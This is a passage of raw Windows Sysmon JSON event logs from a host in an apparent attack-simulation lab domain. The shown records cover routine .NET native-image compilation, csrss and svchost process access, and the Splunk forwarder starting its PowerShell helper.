08:05:43.335","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2253-5F25-0000-00101D5A0D00}","TargetProcessId":"1344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7499,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.335\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2253-5F25-0000-00101D5A0D00}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.335","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2253-5F25-0000-00101D5A0D00}","TargetProcessId":"1344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7500,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.351\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-0010FCB80D00}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.351","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-0010FCB80D00}","TargetProcessId":"1344","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7501,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:43.382\r\nProcessGuid: {41C8662E-2257-5F25-0000-0010FCB80D00}\r\nProcessId: 1344\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\540-0\\PresentationFramework-SystemXmlLinq.dll\r\nCreationUtcTime: 2020-08-01 08:05:43.382","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:43.382","ProcessGuid":"{41C8662E-2257-5F25-0000-0010FCB80D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\540-0\\PresentationFramework-SystemXmlLinq.dll","CreationUtcTime":"2020-08-01 08:05:43.382","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7502,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.413\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2253-5F25-0000-00109E5D0D00}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.413","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2253-5F25-0000-00109E5D0D00}","TargetProcessId":"1428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7503,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.413\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2253-5F25-0000-00109E5D0D00}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.413","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2253-5F25-0000-00109E5D0D00}","TargetProcessId":"1428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7504,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.429\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-001018BD0D00}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.429","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-001018BD0D00}","TargetProcessId":"1428","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7505,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.429\r\nProcessGuid: {41C8662E-2257-5F25-0000-0010D4BD0D00}\r\nProcessId: 4288\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.429","ProcessGuid":"{41C8662E-2257-5F25-0000-0010D4BD0D00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7506,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.429\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-0010D4BD0D00}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:43.429","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2257-5F25-0000-0010D4BD0D00}","TargetProcessId":"4288","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7507,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:43.429\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2257-5F25-0000-0010D4BD0D00}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 